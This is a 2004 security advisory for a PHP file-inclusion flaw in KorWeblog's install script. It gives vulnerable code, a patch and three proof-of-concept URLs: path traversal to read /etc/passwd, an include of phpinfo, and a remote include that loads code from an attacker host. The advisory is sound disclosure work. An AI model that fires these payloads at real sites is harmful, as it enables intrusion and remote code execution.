<<< Date Index >>>     <<< Thread Index >>>

KorWeblog php injection Vulnerability




KorWeblog php injection Vulnerability

Release Date : 2004/12/31 (KST)
Author : Mins (mins at fsu.or.kr)
Product : KorWeblog http://weblog.kldp.org
Vendor-Status: Vendor was contacted but I could not receive reply message.
Vendor-Patches: None
Impact: Attacker can execute arbitrary php code.


Summary
=======
KorWeblog is one of popular blog system in Korea.
The "lng" parameter in "/install/index.php" isn't properly verified, before it 
is used to include files.
And Attacker does not need "register_globals=On".
So this vulnerability would allow remote user to inject php codes.


Affected Products
=================
korweblog 1.6.2-cvs and prior

- 1st case
php.ini : magic_quotes_gpc = Off

- 2nd case
php.ini : magic_quotes_gpc = On

- 3rd case
php.ini : allow_url_fopen : On


Vendor Status : NOT FIXED
=============
2004-12-23 Vulnerability found
2004-12-26 Notified vendor.
2004-12-27 Could not receive reply message.
2004-12-27 Mins made temporary patch.
2004-12-29 2nd vendor Contact.
2004-12-30 Release of unoffical patch.
2004-12-31 Offical advisory release.


Details
=======
If "/install/index.php" exists, attacker can execute arbitrary php code.

Part of weak source (/install/index.php)
----
ini_set('magic_quotes_gpc',1);
ini_set('magic_quotes_sybase',0);

include("../include/misc.inc.php");
include("../include/sql.inc.php");
include("include/check.inc.php");

if(!ini_get("register_globals")) {
      include("include/grab_globals.inc.php");
      }

      $url = eregi_replace("(/install/|/install)$","",F_GetBaseURL());
      $path = 
eregi_replace("(/install/|/install)$","",dirname($_SERVER['SCRIPT_FILENAME']));

      $G_VER = "1.6.2";

      if (!empty($lng)) include("lang/$lng" . ".php");

Keep in mind that the setting magic_quotes_gpc will not work at runtime.
When the "magic_quotes_gpc" is 'Off', attacker can add '%00' to '$lng'.

However if "magic_quotes_gpc" is 'On', attacker can open only '.php' file.
That's right. But attacker is able to use another file.

Part of another same package source (/include/main.inc.php)
----
if (eregi("main.inc.php", $_SERVER['PHP_SELF']))
   die ("You can not access this file directly...");

set_magic_quotes_runtime(0);
ini_set('magic_quotes_gpc',1);
ini_set('magic_quotes_sybase',0);

include("$G_PATH/include/sql.inc.php");
include("$G_PATH/include/layout.inc.php");
include("$G_PATH/include/parser.inc.php");


Proof of Concepts
=================

- 1st case
php.ini : register_globals = On, magic_quotes_gpc = Off
http://[victim]/weblog/install/index.php?lng=../../../../../../etc/passwd%00

- 2nd case
php.ini : register_globals = On
http://[victim]/weblog/install/index.php?lng=../../phpinfo

- 3rd case
php.ini : register_globals = On, allow_url_fopen : On
http://[victim]/weblog/install/index.php?lng=../../include/main.inc&G_PATH=http://[hacker]

Solution
========
- remove the install file

- Set "allow_url_fopen" to "Off".

- unoffical patch
mins@hackme:~/public_html/korweblog-1.6.1/install$ cat index.diff
--- index_1_6_1.php     Mon Dec 27 17:31:50 2004
+++ index.php   Mon Dec 27 17:40:51 2004
@@ -18,7 +18,10 @@

 $G_VER = "1.6.1";

-if (!empty($lng)) include("lang/$lng" . ".php");
+if (!empty($lng)) {
+       if (eregi("\.\.",$lng) || eregi("/",$lng)) $lng="korean";
+       include("lang/$lng" . ".php");
+}

 $sql_form ="<P>
        <TABLE><TR><TD COLSPAN=2><B>". _SQL_INPUT ."</B></TD>

Credits
=======
Mins at FSU (mins at fsu.or.kr)